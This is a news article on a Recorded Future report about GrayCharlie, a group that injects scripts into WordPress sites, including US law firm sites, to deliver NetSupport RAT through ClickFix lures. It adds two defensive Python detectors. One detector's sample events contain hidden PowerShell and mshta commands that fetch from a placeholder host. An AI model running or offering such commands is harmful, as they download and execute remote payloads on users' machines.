Website impersonating “Wiser University” (Source: Recorded Future)
A highly active cybercriminal group is turning legitimate websites into traps, deploying a potent mix of fake browser updates and deceptive “ClickFix” pop-ups to distribute remote access trojans. A new cyber threat analysis from Recorded Future’s Insikt Group sheds light on the evolving tactics of GrayCharlie, a threat actor that has been systematically compromising WordPress sites since mid-2023.
While the group’s net is cast wide, recent evidence points to a highly targeted supply-chain attack that has compromised the websites of numerous United States law firms.
GrayCharlie’s modus operandi relies on injecting malicious scripts into the Document Object Model (DOM) of legitimate, but vulnerable, WordPress sites. Once a user visits an infected page, the trap is sprung.
According to the report, “GrayCharlie compromises WordPress sites and injects them with links to externally hosted JavaScript that redirects visitors to NetSupport RAT payloads delivered via fake browser update pages or ClickFix mechanisms”.
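The injection the report describes is a reference to externally hosted JavaScript added to a page's DOM. One defender-side check is to crawl your own site and list every `<script src>` whose host is neither the site itself nor a vendor you knowingly load from. The script below is an added example written for this article, not code from Recorded Future or from the report; the HTML, hostnames and allow list in it are constructed samples, not indicators from the campaign.

```python
# Added example (not from the report): list <script src="..."> references on a
# page whose host is neither first-party nor on an explicit allow list.
# The sample HTML and every hostname below are constructed, not real IoCs.
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in the page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def _is_first_party(host, site_host):
    """True for the site host itself and any of its subdomains (www., cdn., ...)."""
    host, site_host = host.lower(), site_host.lower()
    return host == site_host or host.endswith("." + site_host)


def find_external_scripts(html, site_host, allowed_hosts=()):
    """Return script URLs that load from hosts outside the site and the allow list.

    Protocol-relative URLs (//host/path) are normalised to https so their host
    can be parsed; relative paths have no host and are treated as first-party.
    """
    parser = ScriptSrcCollector()
    parser.feed(html)
    allowed = {h.lower() for h in allowed_hosts}
    flagged = []
    for src in parser.srcs:
        src = src.strip()
        if src.startswith("//"):
            src = "https:" + src
        host = urlparse(src).hostname
        if host is None:  # relative path, served by the site itself
            continue
        if _is_first_party(host, site_host) or host.lower() in allowed:
            continue
        flagged.append(src)
    return flagged


# Constructed sample page: one relative script, one allowed vendor script,
# one inline script, one first-party subdomain script and one injected
# protocol-relative reference to an unknown host.
SAMPLE_HTML = """
<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.allowed-vendor.example/lib/1.0/lib.min.js"></script>
<script src="//static.injected-sample.invalid/a.js"></script>
<script>var inlineConfig = 1;</script>
</head><body>
<script src="https://www.lawfirm.example/wp-content/themes/t/app.js"></script>
</body></html>
"""

if __name__ == "__main__":
    for url in find_external_scripts(SAMPLE_HTML, "lawfirm.example",
                                     ["cdn.allowed-vendor.example"]):
        print("external script:", url)
```

Run it against saved copies of your own pages (or the output of a crawler) and review anything it prints; a host you do not recognise, especially one that appeared without a corresponding plugin or theme change, is worth investigating.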
While the group initially relied heavily on fake browser updates, it has adapted its lures. “In late March or early April 2025, SmartApeSG shifted from using fake browser updates to deploying ClickFix lures, mirroring a broader trend among threat actors of increasingly adopting ClickFix”. These ClickFix prompts often masquerade as fake CAPTCHA verifications, instructing users to press Win+R and paste a malicious command. This command secretly downloads and executes the NetSupport RAT in the background.
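Because a ClickFix prompt asks the user to paste the command into the Win+R Run dialog, the resulting process is a child of explorer.exe, which gives endpoint telemetry a usable anchor: explorer.exe spawning a script interpreter or downloader with a command line that hides its window or fetches content. The detector below is an added example for this article, not code or a rule from the report; the log-line format and all five events are constructed samples, and the hostnames are placeholders.

```python
# Added example (not from the report): flag process-creation events matching
# the ClickFix chain described above. The pipe-delimited log format and every
# event below are constructed samples; hostnames are placeholders.
import ntpath

# Children a ClickFix lure typically tells the victim to launch from Win+R.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# Command-line fragments indicating hidden execution or a remote fetch.
SUSPICIOUS_TOKENS = ("-w hidden", "-windowstyle hidden", "-enc", "-encodedcommand",
                     "downloadstring", "invoke-webrequest", "invoke-expression",
                     "iwr ", "irm ", "http://", "https://")


def parse_event(line):
    """Parse 'id|ParentImage|Image|CommandLine' (constructed format) into a dict."""
    event_id, parent, image, cmdline = line.rstrip("\n").split("|", 3)
    return {"id": event_id, "parent": parent, "image": image, "cmdline": cmdline}


def is_clickfix_candidate(event):
    """explorer.exe parent + interpreter child + at least one suspicious token."""
    parent = ntpath.basename(event["parent"]).lower()
    child = ntpath.basename(event["image"]).lower()
    if parent != "explorer.exe" or child not in INTERPRETERS:
        return False
    cmd = event["cmdline"].lower()
    return any(tok in cmd for tok in SUSPICIOUS_TOKENS)


def flag_clickfix(lines):
    """Return the ids of events that match the ClickFix pattern."""
    return [e["id"] for e in map(parse_event, lines) if is_clickfix_candidate(e)]


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    # 1: Run-dialog launch of a hidden PowerShell that fetches a URL -> flag
    "1|C:\\Windows\\explorer.exe|" + PS +
    "|powershell -w hidden -c \"iwr https://verify-sample.invalid/check\"",
    # 2: ordinary GUI app from explorer -> ignore
    "2|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt",
    # 3: scripted PowerShell, but parent is cmd.exe, not the Run dialog -> ignore
    "3|C:\\Windows\\System32\\cmd.exe|" + PS +
    "|powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    # 4: user simply opened PowerShell from Win+R, no suspicious tokens -> ignore
    "4|C:\\Windows\\explorer.exe|" + PS + "|powershell.exe",
    # 5: mshta pointed at a remote URL from the Run dialog -> flag
    "5|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\mshta.exe"
    "|mshta https://verify-sample.invalid/verify",
]

if __name__ == "__main__":
    print("flagged events:", flag_clickfix(SAMPLE_EVENTS))
```

The same three conditions translate directly into a Sigma process_creation rule (ParentImage ends with `\explorer.exe`, Image in the interpreter list, CommandLine contains one of the tokens); tune the token list against your own baseline, since administrators who launch PowerShell with `-enc` from the Run dialog will otherwise generate noise.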
The researchers noted that “Insikt Group identified a cluster of United States (US) law firm sites that were likely compromised around November 2025, possibly through a supply-chain compromise involving a shared IT provider”.
The investigation uncovered that at least fifteen law firm websites were actively loading external malicious JavaScript. The common denominator appears to be a third-party IT provider. “One potential avenue is SMB Team, the self-described ‘fastest-growing law firm acceleration company,’ which has supported thousands of firms across North America… as its logo and other references appear across many of the websites”. The report suggests the threat actors may have gained access to this infrastructure through legitimate, compromised credentials.
Once GrayCharlie establishes a foothold via the NetSupport RAT, the infection rarely stops there. The group maintains an extensive command-and-control (C2) infrastructure, largely hosted on MivoCloud and HZ Hosting Ltd.
Once connected to this C2 network, the operators can execute reconnaissance commands, steal files, and deploy secondary malware. The report warns that “These infections often progress to the deployment of Stealc and SectopRAT”.
The ultimate goals of GrayCharlie remain focused on data theft and financial gain. To mitigate this persistent threat, organizations are urged to update their defenses. “To protect against GrayCharlie, security defenders should block IP addresses and domains tied to associated remote access trojans (RATs) and infostealers, flag and potentially block connections to compromised websites, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections”.